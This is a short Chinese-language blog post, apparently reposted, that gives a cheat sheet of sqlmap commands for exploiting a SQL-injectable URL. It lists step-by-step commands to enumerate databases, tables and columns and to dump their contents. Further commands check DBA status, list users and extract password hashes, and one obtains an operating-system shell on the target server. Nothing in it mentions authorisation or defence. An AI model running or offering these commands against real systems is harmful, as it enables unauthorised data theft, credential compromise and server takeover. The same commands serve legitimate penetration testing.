码迷,mamicode.com
首页 > 数据库 > 详细

sqlmap常用语句

时间:2018-02-19 16:39:07      阅读:279      评论:0      收藏:0      [点我收藏+]

标签:span   start   bsp   nbsp   tar   read   查看   table   数据库名   

1.查看数据库:  sqlmap.py -u 存在注入的URL地址 --dbs  sqlmap.py -u "" --dbs

2.接下来查看表名:  sqlmap.py -u 存在注入的URL地址 -D 数据库名 --tables  sqlmap.py -u "" -D "" --tables

3.查看字段:  sqlmap.py -u 存在注入的URL地址 -D 数据库名 -T 表名 --columns  sqlmap.py -u "" -D "" -T "" --columns

4.爆字段内容  sqlmap.py -u 存在注入的URL地址 -D 数据库名 -T 表名 -C 列名 --dump  sqlmap.py -u "" -D "" -T "" -C "" --dump

5.脱库 sqlmap.py -u 存在注入的URL地址 -D 数据库名 -T 表名 -C 列名1,列名2 --dump --

threads=10 --start=1 --stop=3  sqlmap.py -u "" -D "" -T "" -C "","" --dump --threads=10 --start=1 --stop=3

python sqlmap.py.py -u 注入地址 --is-dba   判断当前用户是不是DBA

python sqlmap.py.py -u 注入地址 --users    查看当前用户

python sqlmap.py.py -u 注入地址 --passwords 查看密码

python sqlmap.py.py -u 注入地址 --privileges 查看权限

python sqlmap.py.py -u 注入地址 --os-shell  写web shell

sqlmap常用语句

标签:span   start   bsp   nbsp   tar   read   查看   table   数据库名   

原文地址:https://www.cnblogs.com/storyline/p/8453886.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!